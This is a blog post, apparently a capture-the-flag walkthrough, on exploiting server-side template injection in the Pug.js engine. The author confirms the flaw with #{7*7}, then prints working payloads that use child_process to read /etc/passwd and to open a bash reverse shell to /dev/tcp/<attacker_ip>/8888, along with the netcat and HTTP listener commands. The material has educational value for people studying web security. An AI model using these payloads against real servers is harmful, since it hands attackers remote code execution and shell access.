🔓 Free Link

Table of Contents

1. Overview
2. Confirming PugJS SSTI
3. Shell Access

Overview

Server-Side Template Injection (SSTI) is a class of vulnerability where user-controlled input is embedded directly into a server-side template and evaluated as code.

Pug.js (formerly Jade) is a popular template engine in the Node.js ecosystem. It offers expressive syntax, embedded javascript evaluation, and direct access to runtime objects. Those features are convenient for developers and dangerous when user input is rendered without strict separation between data and logic.

Vulnerability Context

The attack surface was a web application rendering user input inside Pug templates. A subtle clue confirmed the template engine in use. By testing template evaluation primitives, the injection point was identified, escalated from arithmetic execution to arbitrary javascript evaluation, and finally weaponized into a reverse shell against the server.

Confirming PugJS SSTI

• Upon initial access, the application presents a feature that converts Pug templates into rendered HTML output.

• I started by testing for generic template injection using a polyglot payload inside an HTML <p> tag:

${{<%[%'"}}%\.

• The server responded by rendering the payload as raw HTML inside a <p> element, without evaluation. This indicated that the input was reflected but not executed in this context.

• Next, I modified the injection point by switching from a standard HTML tag (p) to a Pug-specific identifier (#).

• This change caused the server to throw a template rendering error, suggesting that the input was now affecting the Pug compilation process rather than plain HTML output.

• To confirm server-side evaluation, I tested a simple Pug interpolation payload:

#{7*7}

• As expected, the server evaluated the expression and returned the result 49. This confirmed a valid SSTI injection point within the Pug template context.

Shell Access

• With SSTI confirmed, I searched for PugJS specific exploitation techniques and referenced the HackTricks SSTI documentation:

https://book.hacktricks.wiki/en/pentesting-web/ssti-server-side-template-injection/index.html

• I attempted to execute a payload designed to read user account information.

# {function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('cat /etc/passwd')}()}

remove space between # and {

• The server returned <undefined>, indicating that direct command execution did not produce visible output in the rendered template.

• Instead of relying on inline command output, I started a local HTTP listener on my attacker machine:

$ python3 -m http.server 8000

• I triggered a curl request from the target to verify outbound connectivity.

• The target server successfully connected back to my Kali machine.

• Based on this, I prepared a reverse shell listener on port 8888:

$ rlwrap nc -klnvp 8888

• I modified the SSTI payload to execute a reverse shell.

# {function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('bash -c "/bin/bash -i >& /dev/tcp/<attacker_ip>/8888 0>&1"')}()}

remove space between # and {

• The payload executed successfully, and I obtained an interactive shell on the target server with user-level privileges.

• From the shell, I enumerated the filesystem and was able to locate and read the flag.

• This assessment demonstrates how dangerous Server-Side Template Injection can be when user input is rendered without proper sanitization. Even when the initial access is limited to a low-privileged user, SSTI can serve as a reliable entry point for deeper compromise and potentially severe impact on the application and underlying infrastructure.

References

• THM
• Hacktricks

📢 Enjoyed this post? Stay connected! If you found this article helpful or insightful, consider following me for more:

• 📖 Medium: bashoverflow.medium.com
• 🐦 Twitter / X: @_havij
• </> Github: havij13
• ☕ Coffee: Ko-fi

🙏Your support is appreciated.